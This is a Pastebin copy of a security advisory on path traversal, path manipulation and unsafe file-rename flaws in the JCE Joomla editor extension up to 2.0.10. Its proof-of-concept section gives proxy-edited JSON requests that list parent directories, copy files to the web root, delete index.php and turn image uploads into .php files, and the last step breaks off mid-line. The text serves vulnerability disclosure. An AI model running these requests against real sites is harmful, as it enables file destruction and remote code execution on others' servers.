Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ########################## www.BugReport.ir #######################################
- #
- # AmnPardaz Security Research Team
- #
- # Title: JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities
- # Vendor: www.joomlacontenteditor.net
- # Exploit: Available
- # Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager 1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions also may be affected)
- # Impact: High
- # Original Advisory: http://www.bugreport.ir/index_78.htm
- # Fix: N/A
- ###################################################################################
- ####################
- 1. Description:
- ####################
- JCE is an extension for Joomla!, that provides you with a set of wysiwyg editor tools that makes the job of writing articles for your Joomla! site a little bit easier.
- In a nutshell, it provides access to many of the features you may be used to using in Word or OpenOffice etc.
- ####################
- 2. Vulnerabilities:
- ####################
- 2.1. Path Traversal Flaws. Path Traversal in "Image Manager", "Media Manager", "Template Manager" and "File Manager" section.
- 2.1.1. Exploit:
- Check the exploit/POC section.
- 2.2. Path Manipulation Flaws. Path Manipulation in "Image Manager", "Media Manager", "Template Manager", "File Manager" section. Attackers can delete any file or upload files to all the directories of the server.
- 2.2.1. Exploit:
- Check the exploit/POC section.
- 2.3. Unsafe function Flaws. Attackers can use unsafe function called "folderRename" for changing Image type extension (.jpg, .gif, .png & etc.) to any extension like .htaccess or .php in "Image Manager", "Media Manager", "Template Manager" and "File Manager" section.
- 2.3.1. Exploit:
- Check the exploit/POC section.
- ####################
- 3. Exploits/PoCs:
- ####################
- Original Exploit URL: http://www.bugreport.ir/78/exploit.htm
- 3.1. Path Traversal Flaws. Path Traversal in "Image Manager", "Media Manager", "Template Manager" and "File Manager" section.
- -------------
- Path Traversal and see all directories:
- Step 1 +--> Click on root (left bar)
- Step 2 +--> Use Proxy (like burp) for changing path:
- json={"fn":"getItems","args":["/","all",0,""]} to json={"fn":"getItems","args":["../../","all",0,""]}
- -------------
- 3.2. Path Manipulation Flaws. Path Manipulation in "Image Manager", "Media Manager", "Template Manager", "File Manager" section. Attackers can delete any file or upload files to all the directories of the server.
- -------------
- For uploading file:
- Step 1 +--> Upload a file with image type extension like azizi.jpg
- Step 2 +--> Click on root (left bar)
- Step 3 +--> Use Proxy (like burp) and change "json" parameter to json={"fn":"fileCopy","args":["/azizi.jpg","../../"]}
- Now azizi.jpg copied to root directory.
- For deleting file:
- Step 1 +--> Click on root (left bar)
- Step 2 +--> Use Proxy (like burp) and change "json" parameter to json={"fn":"fileDelete","args":"../../index.php"}
- Now index.php has been deleted.
- -------------
- 3.3. Unsafe function Flaws. Attackers can use unsafe function for changing Image type extension (.jpg, .gif, .png & etc.) to any extension like .htaccess or .php in "Image Manager", "Media Manager", "Template Manager" and "File Manager" section.
- -------------
- For uploading file with executable extension:
- Step 1 +--> Upload a file with image type extension like azizi.jpg
- Step 2 +--> Click on root (left bar)
- Step 3 +--> Use Proxy (like burp) and change "json" p
- ####################
- 4. Solution:
- ####################
- Restricting and granting only trusted users having access to resources and wait for vender patch.
- ####################
- 5. Credit:
- ####################
- AmnPardaz Security Research & Penetration Testing Group
- Contact: admin[4t}bugreport{d0t]ir
- www.BugReport.ir
- www.AmnPardaz.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement